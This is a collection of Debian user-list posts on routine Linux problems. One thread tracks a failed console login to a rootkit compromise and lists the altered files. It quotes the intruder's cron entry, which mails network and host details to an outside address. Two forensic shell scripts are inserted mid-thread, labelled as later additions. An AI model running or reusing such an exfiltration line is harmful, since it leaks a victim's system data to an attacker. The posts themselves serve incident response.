Re: Making a distribution

2003-12-11 Thread Patrick Lesslie
On Wed, Dec 10, 2003 at 06:30:26PM -0800, Karsten M. Self wrote:
> on Wed, Dec 10, 2003 at 04:29:41PM -, Antony Gelberg ([EMAIL PROTECTED]) wrote:
> > Hi all,
> > 
> > One of the things I often do in my line of work is install a Linux bridging
> > firewall.  I generally install a minimal Debian, recompile the kernel, and
> > run my bridge and firewall scripts from bootmisc.sh.
> > 
> > What I'd really like is to create a distribution of my own that would
> > install automatically onto a PC, with minimal interactivity.  For example, I
> > don't want to be asked about partitioning, I just want to wipe the disk,
> > create an ext3 partition and format it.  I want vim, links, sshd (amongst
> > others).  I want apt-get and a custom 2.4.23 kernel.
> > 
> > Is there a way to do this based on Debian (for apt-get etc)?  I am a big
> > Debian fan, but even a minimal install is more than I need.
> 
> FAI.  Bootfloppies.  Possibly other ideas.
> 
> Or look at Linux From Scratch.

One messy way is to make a CD image with mkisofs that boots linux,
runs fdisk to format /dev/hda, untars a small customised root partition
taken from an existing installation, and runs lilo (using chroot I guess).

Patrick Lesslie


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: PDF & cut-&-paste ???

2003-12-16 Thread Patrick Lesslie
On Tue, Dec 16, 2003 at 01:05:44AM -0600, Michael D Schleif wrote:
> Which PDF readers allow blocking and cut-&-paste?
> 
> Also, which allow searching for text and phrases?

xpdf allows cut and paste.  It feels funny because it is a
pixel-wise block, but it works.

For searching, it might be enough to use pdftotext | grep 
I don't know which other ones allow searching.

Patrick Lesslie





Re: PDF & cut-&-paste ???

2003-12-16 Thread Patrick Lesslie
On Tue, Dec 16, 2003 at 06:46:16PM +1100, Patrick Lesslie wrote:
> On Tue, Dec 16, 2003 at 01:05:44AM -0600, Michael D Schleif wrote:
> > Which PDF readers allow blocking and cut-&-paste?
> > 
> > Also, which allow searching for text and phrases?
> 
> xpdf allows cut and paste.  It feels funny because it is a
> pixel-wise block, but it works.
> 
> For searching, it might be enough to use pdftotext | grep 
> I don't know which other ones allow searching.

Ok, I take that back ... xpdf has a search button.





console login fails

2003-12-18 Thread Patrick Lesslie
Hi,

I'm having trouble logging into tty1-tty6.  

I get a prompt, put in my username and hit enter, and then
it hangs for 10 seconds without asking for a password,
and brings up another login prompt.

Has anyone seen this?  I'm having trouble finding relevant hits.

thx,

Patrick Lesslie





Re: console login fails

2003-12-18 Thread Patrick Lesslie
On Fri, Dec 19, 2003 at 02:12:48PM +1100, Patrick Lesslie wrote:
> I'm having trouble logging into tty1-tty6.  
> 
> I get a prompt, put in my username and hit enter, and then
> it hangs for 10 seconds without asking for a password,
> and brings up another login prompt.

Having done a bit more research, I'm upgrading "util-linux" and the
aptly named "login" to sarge (some things were already there ;).
However apt-get install login fails like this:

...
Unpacking replacement login ...
dpkg: error processing /var/cache/apt/archives/login_1%3a4.0.3-12_i386.deb (--unpack):
 unable to make backup link of `./bin/login' before installing new version: Operation not permitted
Errors were encountered while processing:
 /var/cache/apt/archives/login_1%3a4.0.3-12_i386.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)

I'm root, and I'm not sure why this is failing.

thanks,

Patrick Lesslie





Re: console login fails

2003-12-20 Thread Patrick Lesslie
On Fri, Dec 19, 2003 at 09:29:46AM -0600, Kent West wrote:
>
> Can you login as a different user? As root?
No.  (I can login to X, or via ssh though).

> Are any of your partitions mounted read-only?
/dev/hda10 on / type ext3 (rw,errors=remount-ro)

> Have you fsck'd your partitions lately?
fsck has been reporting them clean.  However 
 e2fsck.ext3 -c /dev/hda10 
from Knoppix 3.2 reported that the fs had been modified, but gave
little information.  I'm sorry I've lost the output, but it didn't
look strange to me.  It hasn't fixed the problem (but see below).

> What are the permissions on './bin/login'?
-rw-rw-rw-  1 root  root  0 Oct  9 09:36 /bin/login

I think I see the problem here.  It's empty. :-}  So getty is
timing out.
However if I try to move this file it gives a permission denied:

root:/bin# mv login login-tmp
mv: cannot move `login' to `login-tmp': Operation not permitted
root:~# chmod 644 /bin/login
chmod: changing permissions of `/bin/login': Operation not permitted
root:~# rm /bin/login
remove write-protected regular empty file `/bin/login'? n

I can copy it, and move other files in the same directory.
It is presumably this problem that is preventing its upgrade.
I suppose I could try dropping another /bin/login on top of it,
or removing it, but I'm quite curious now.  However, I don't know
enough about filesystems to know what has happened.

root:~# stat /bin/login
  File: `/bin/login'
  Size: 0   Blocks: 0  IO Block: 4096   Regular File
Device: 30ah/778d   Inode: 17894   Links: 1
Access: (0666/-rw-rw-rw-)  Uid: (0/root)   Gid: (0/ root)
Access: 2003-10-09 09:36:03.0 +1000
Modify: 2003-10-09 09:36:03.0 +1000
Change: 2003-10-09 09:36:03.0 +1000

Nothing else is playing up, the system seems fine apart from this.
Thanks very much for your advice.

Patrick Lesslie
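
Root receiving "Operation not permitted" from mv, chmod and dpkg on a read-write ext3 mount, as in the transcript above, is the behaviour produced by the ext2/ext3 immutable (i) and append-only (a) file attributes, which ls and stat do not display but lsattr does. The script below is an added example, not part of the original post; the function names are assumptions, and the sample lines are constructed except where the comment says otherwise.

```shell
#!/bin/sh
# Added example: explain why root cannot rename, chmod or replace a file.
# Function names are assumptions of this sketch, not from the thread.

# explain_flags: read `lsattr` output on stdin and print
# "<path>: <reasons>" for every entry carrying i (immutable) or
# a (append-only). Directory header lines from `lsattr -R` are skipped.
explain_flags() {
    awk 'NF >= 2 && $1 ~ /^[-A-Za-z]+$/ {
        why = ""
        if ($1 ~ /i/) why = why " immutable"      # lowercase i only
        if ($1 ~ /a/) why = why " append-only"    # lowercase a only
        if (why == "") next
        path = $0; sub(/^[^ \t]+[ \t]+/, "", path)
        print path ":" why
    }'
}

# check_path FILE: inspect FILE and its parent directory, because an
# immutable parent directory also blocks rename and unlink.
check_path() {
    command -v lsattr >/dev/null 2>&1 || { echo "lsattr not available" >&2; return 2; }
    lsattr -d "$1" "$(dirname "$1")" 2>/dev/null | explain_flags
}

# Constructed lsattr output for trying explain_flags offline. The
# "suSiadAc--" line is the attribute string quoted later in this thread.
sample_lsattr() {
    cat <<'EOF'
-------------e-- /bin/ls
suSiadAc-- /old/bin/login
----i--------e-- /bin

/lib/security:
-----a-------e-- /var/log/auth.log
EOF
}

# Typical use:  check_path /bin/login
#          or:  lsattr -R /bin /sbin /lib /etc 2>/dev/null | explain_flags
```

Run it from known-good rescue media against the mounted disk where possible, since lsattr on a suspect system may itself have been replaced.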





Re: kazaa

2003-12-20 Thread Patrick Lesslie
On Sat, Dec 20, 2003 at 10:41:50AM +, Dr Gavin Seddon wrote:
> Hello,
> Last night I was at a friend's house and he showed me Kazaa lite.  I
> found this morning it is possible to run it on my Debian machine using
> wine.  Can anyone tell me how to do this, pls?

Unless you really want wine and kazaa-lite, you might enjoy the similar
functionality of gtk-gnutella.





Re: Suspected system compromise (was: Re: console login fails)

2003-12-22 Thread Patrick Lesslie
On Mon, Dec 22, 2003 at 04:29:48AM -0800, Karsten M. Self wrote:
> on Fri, Dec 19, 2003 at 05:25:13PM +1100, Patrick Lesslie wrote:
> > On Fri, Dec 19, 2003 at 02:12:48PM +1100, Patrick Lesslie wrote:
> >  unable to make backup link of `./bin/login' before installing new version: Operation not permitted
> > Errors were encountered while processing:
> >  /var/cache/apt/archives/login_1%3a4.0.3-12_i386.deb
> > E: Sub-process /usr/bin/dpkg returned an error code (1)
> > 
> > I'm root, and I'm not sure why this is failing.
> 
> I smell a system compromise.

You smell correctly.  I discovered it shortly after Kent's post,
when my old woody chkrootkit found suspicious files in
/lib/security/.config/.  It turned out to be (a variant of perhaps)
the "adore" rootkit.  I don't know how they got in, there weren't
old enough logs, and perhaps some were removed, but let's just
say security wasn't "stellar".  It had been compromised for 73 days
before I got around to fixing what I thought was just a bug in the
virtual console login.  It was a home gateway, and a desktop with
heaps of packages.

> First try 'lsattr /bin/login'.  Check that the partition is mounted
> writable.
 
# ls -l /old/bin/login
suSiadAc-- /old/bin/login
# ls -l /bin/login
-- /bin/login

> Look at your process table -- 'cd /proc; echo *' or 'cd /proc; ls '
> should show you what's available.  Treat with suspicion any process IDs
> which persistently appear in output of one or the other of those
> actions, but not in 'ps ux' output.
>
> Better:  Immediately disconnect your system from network and boot known
> good media:  a rescue disk, LNX-BBC, Damn Small Linux, Knoppix,
> tomsrtbt, etc.  Compare /bin/login vs. md5sum from
> /var/lib/dpkg/info/login.md5sums.
 
It was empty, so the sums probably would not match :)

> http://www.wiggy.net/debian/developer-securing/

Thanks for those good tips.

We found some compromised files by modification date:

/bin/login
/lib/libext-2.so.7  ("dbx7If0tG/8ZM")
/etc/ld.so.hash ("dbx7If0tG/8ZM")
/usr/include/hosts.h ("3 4784\n4 4784")
/etc/shadow-
/var/spool/cron/crontabs/operator
/lib/security/.config/ssh/ssh_random_seed
/lib/security/.config/ssh/sshd_config
/lib/security/.config/ssh/ssh_host_key.pub (a key for "[EMAIL PROTECTED]")
/lib/security/.config/sshd
/usr/sbin/xntps
/var/tmp/.../s
/var/tmp/.../apal/samba
/var/tmp/.../apal/scan

The first four files had modified attributes.  The last five were
binaries.  The kit apparently enables a second ssh server on a high
port like 15000, with public key authentication.

My favourite file was the last one, which contained this cron entry:

# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (crontab-entry installed on Thu Oct  9 09:36:03 2003)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0 0 1 * * /sbin/ifconfig |grep inet >/tmp/.log 2>/dev/null; /bin/hostname -f >>/tmp/.log 2>/dev/null; /usr/local/games/banner /usr/local/games/tcp.log >>/tmp/.log 2>/dev/null; cat /tmp/.log|mail -s 'tcp.log' [EMAIL PROTECTED] >/dev/null 2>&1; rm -f /tmp/.log >/dev/null 2>&1

So much for me hoping that our dynamic IP would have helped ;-)

So, I've reinstalled on another partition, and put a gateway in between, 
and I've learned some lessons too.

Patrick
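
The two checks used in this message, comparing package files against /var/lib/dpkg/info/*.md5sums from rescue media and then finding further files by modification date, can be scripted as follows. This is an added example, not code from the thread; the function names and the sample tree are assumptions, and it requires GNU coreutils and findutils.

```shell
#!/bin/sh
# Added example: offline triage of a suspect Debian root filesystem mounted
# read-only from rescue media. Function names are assumptions of this sketch.
# Needs GNU coreutils and findutils (md5sum, stat -c, find -newermt).

# verify_pkg ROOT PKG: check each file in ROOT/var/lib/dpkg/info/PKG.md5sums.
# Prints MISSING/EMPTY/MODIFIED lines; returns 0 clean, 1 bad, 2 no list.
verify_pkg() {
    root=$1 list="$1/var/lib/dpkg/info/$2.md5sums" bad=0
    [ -r "$list" ] || { echo "NOLIST $2"; return 2; }
    while read -r want rel; do          # "<md5>  <path relative to />"
        f="$root/$rel"
        if [ ! -e "$f" ]; then echo "MISSING /$rel"; bad=1; continue; fi
        got=$(md5sum < "$f" | cut -d' ' -f1)
        [ "$got" = "$want" ] && continue
        # A zero-length binary is the case seen in this thread.
        if [ -s "$f" ]; then echo "MODIFIED /$rel"; else echo "EMPTY /$rel"; fi
        bad=1
    done < "$list"
    return "$bad"
}

# mtime_neighbours ROOT FILE MINUTES: files under ROOT modified within
# +/- MINUTES of FILE, i.e. what else changed when FILE was replaced.
mtime_neighbours() {
    t=$(stat -c %Y "$2") || return 2    # mtime as epoch seconds
    w=$(( $3 * 60 ))
    find "$1" -xdev -type f -newermt "@$((t - w))" ! -newermt "@$((t + w))" | sort
}

# Constructed sample tree (not data from the thread) to try the functions on.
make_sample_root() {
    r=$(mktemp -d) || return 1
    mkdir -p "$r/bin" "$r/etc" "$r/var/lib/dpkg/info"
    echo good > "$r/bin/su"; echo trojan > "$r/bin/passwd"; : > "$r/bin/login"
    ok=$(md5sum < "$r/bin/su" | cut -d' ' -f1)
    printf '%s  bin/%s\n' "$ok" su "$ok" passwd "$ok" login "$ok" newgrp \
        > "$r/var/lib/dpkg/info/login.md5sums"
    : > "$r/etc/ld.so.hash"
    touch -d '2003-10-09 09:36:03' "$r/bin/login" "$r/etc/ld.so.hash"
    touch -d '2003-06-01 12:00:00' "$r/bin/su" "$r/bin/passwd"
    echo "$r"
}

# Typical use after `mount -o ro /dev/hda10 /mnt` from rescue media:
#   verify_pkg /mnt login; mtime_neighbours /mnt /mnt/bin/login 10
```

The md5sums list lives on the suspect disk and mtimes can be reset with touch, so a clean result is not proof of integrity. Compare against a package fetched from a trusted mirror and repeat the time search with `-newerct` for change times.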





Re: Suspected system compromise (was: Re: console login fails)

2003-12-22 Thread Patrick Lesslie
On Tue, Dec 23, 2003 at 01:46:56AM +1100, Patrick Lesslie wrote:
> My favourite file was the last one ...
I mean, the crontab one.

> Patrick





Re: Menu maker

2003-12-22 Thread Patrick Lesslie
On Mon, Dec 22, 2003 at 06:22:32PM -0600, Damon L. Chesser wrote:
> Is Menu maker part of deb?  I can't seem to find it.  I searched for
> menumaker, menu-maker, mmaker, menmaker.

Perhaps you mean the "menu" package.  Also, wmaker provides "WPrefs",
which lets you customise the wmaker menu.





Re: Root Partition Fills Up Completely After a Few Hours

2003-12-26 Thread Patrick Lesslie
On Thu, Dec 25, 2003 at 09:40:14PM -0800, Scarletdown wrote:
> 
> Leaving the system unattended for a few hours, the / partition on my 
> hard drive mysteriously fills up.  When I open up KDiskfree, the 
> partition in question shows as 100% used (red line all the way across.)
> 
> This has happened twice now.  The first time was after I went to bed 
> last night.  When I got up this morning, the drive was full.  Then, it 
> happened again while we were out doing Christmas dinner and movies.  We 
> left around 11:30 this morning, and when we returned just about a half 
> hour ago, it was full again.  Both times, I was able to clear it by 
> logging out and back in again.
 
I saw a problem a bit like this once on a potato machine running kde.
I can't remember the details, but there was a huge file of zeros
in a .kde directory or similar.

I found it by doing du -sh * from the top directory and following
down through the biggest ones until I found the file.  Finding the
file will give you some clue as to its origin.  Someone might
suggest a find command to find all the really large files in one go.

> I'm suspecting that the culprit is ipmasq.  I noticed that when I'm 
> logged in to any text console, I occasionally get various firewall 
> status lines, such as:
> 
> IN= OUT=eth0 SRC=68.113.22.3 DST=68.111.54.95 LEN=40 TOS=0x00 PREC=0x00 
> TTL=64 ID=0 DF PROTO=TCP SP
> 
> I'm guessing that this stuff is also going into some sort of temporary 
> log file, which gets rather full after a few hours.  What can I do to 
> stop this?  At the very least, I would like to set things up so ipmasq 
> either creates no log file, or limits the size of the file to something 
> reasonable.  I'd also like to set it so those messages don't come up on 
> the screen as well, as it gets rather annoying when I'm working from a 
> console.

On my system they are logged into /var/log/kern.log*
I don't think they are likely to be the problem unless you either have
a tiny amount of free space or a _really_ busy site.  These log files
normally amount to just a few megabytes.

There are a couple of ways to stop the logging to the console.
The only one I know off hand is a bit dirty - that is:

# echo "1 4 1 6" > /proc/sys/kernel/printk

to adjust the kernel logging levels.  You could put it in a startup
script or just run it when you feel like it.  Have a look at that file
to see what it is now.

There are much nicer ways though!  It would be better for instance to
redirect all that stuff to one virtual console.

Patrick Lesslie





Re: no devices or drivers dir under /proc/bus/usb

2004-01-22 Thread Patrick Lesslie
On Thu, Jan 22, 2004 at 07:07:00AM -0600, Vale Kenny wrote:
> According to linux-usb.org, after I've mounted usbdevfs and
> loaded the necessary usb modules, I should have two directories
> under /proc/bus/usb, devices and drivers.  I have naught.  
> I'm completely out of ideas.  Here are the logs and various bits 
> of information I thought would be useful.

Can you confirm that it is mounted?  You want this in /etc/fstab:
none  /proc/bus/usb   usbdevfs defaults   0 0





Re: Re: no devices or drivers dir under /proc/bus/usb

2004-01-22 Thread Patrick Lesslie
On Thu, Jan 22, 2004 at 07:50:43AM -0600, Vale Kenny wrote:
> /etc/fst# /etc/fstab: static file system information.

> none  /proc/bus/usb   usbfs   defaults  0   0
> usbdevfs  /proc/bus/usb usbdevfs defaults 0 0

Maybe try without the second line.  I only have the first one.
Also there's some information in Documentation/usb/proc_usb_info.txt
in the kernel source tree that might help.

Patrick Lesslie





Re: LILO

2004-02-28 Thread Patrick Lesslie
On Sat, Feb 28, 2004 at 10:10:29PM -0500, MacNean Tyrrell wrote:
> my lilo seems to be screwed up, it
> boots and I get some OS/2 thing, I even tried reinstalling debian from net,
> it ejects the disk and reboots and same thing.  What do I do?
 
Do you mean you can't boot from a rescue disk?  If you can, you'll
be able to work on the MBR.

Have a look in your BIOS to make sure it's set up to boot from floppy,
or better from CD, and that there isn't anything screwy going on.

Also you could send more specific information on what you have tried
and exactly what happened when you tried it.

> How can I edit LILO or erase the mbr or something so I can start all over?

Once you can boot from a rescue disk with root=/dev/hda1 or similar
you'll be able to edit lilo and run it.  There are other ways too,
but first try a rescue floppy or CD until you can boot linux.

best of luck,
Patrick Lesslie





Re: FreeS/WAN patch compatibility with freeswan package?

2004-01-30 Thread Patrick Lesslie
(A late reply)

On Mon, Jan 19, 2004 at 10:41:46AM -0800, Adam Morley wrote:
> Hi,
> 
> I have a server where I'd like to be able to use functionality 
> provided by later versions of the freeswan kernel patch --- namely, 
> 0.9.14 of the X.509 patches provided support for the 
> leftprotoport/rightprotoport.  
> (http://www.strongsec.com/freeswan/install.htm#section_4.5).

That's a nice page.

> I'd rather not have to build my own versions of the freeswan 
> package, but use the one already included with Debian Woody. 
> Is this possible if I'm running a later version of the freeswan 
> kernel patch (like this one: 
> http://www.strongsec.com/freeswan/x509patch-0.9.37-freeswan-1.99.tar.gz)?
> Or will I have to track both the kernel patch and a later version
> of the freeswan tools?
> 
> I thought I could use sarge's freeswan package, but being that 
> I'm rather new to Debian, I don't know a whole lot about just 
> upgrading that one package.  Suggestions for the best "debian way" 
> to do something like this would be helpful.

I can't answer your first question about whether you need to upgrade
freeswan to work with the later kernel patch, but I might say, 
in order to install something from sarge, just update to sarge, 
install it and then update to stable and no one will be any the wiser 
(ducks)

You can simulate install with apt-get -s install freeswan

If it goes in and you change your mind, you will need to
explicitly downgrade, e.g.:
apt-get install freeswan=

Some people do this, using mixed releases with debian stable,
testing, and unstable quite routinely.  I think it's a nice thing
about Debian that it very often works, because of the dependency
checking in .deb files.  It is basically deprecated though, I guess
because some core things have to be in one distribution or other
or they don't work properly, but I don't really know.

More thorough is to backport it, or find a woody backport from
someone reputable.  This avoids recompiling (if possible)
the testing or unstable source on your woody system, which is also
good of course.

Actually, looking now, you may need to recompile it (not difficult).
This is a better answer to the second question, from the archives of 
this very list:

http://lists.debian.org/debian-user/2003/debian-user-200306/msg02995.html

Patrick Lesslie

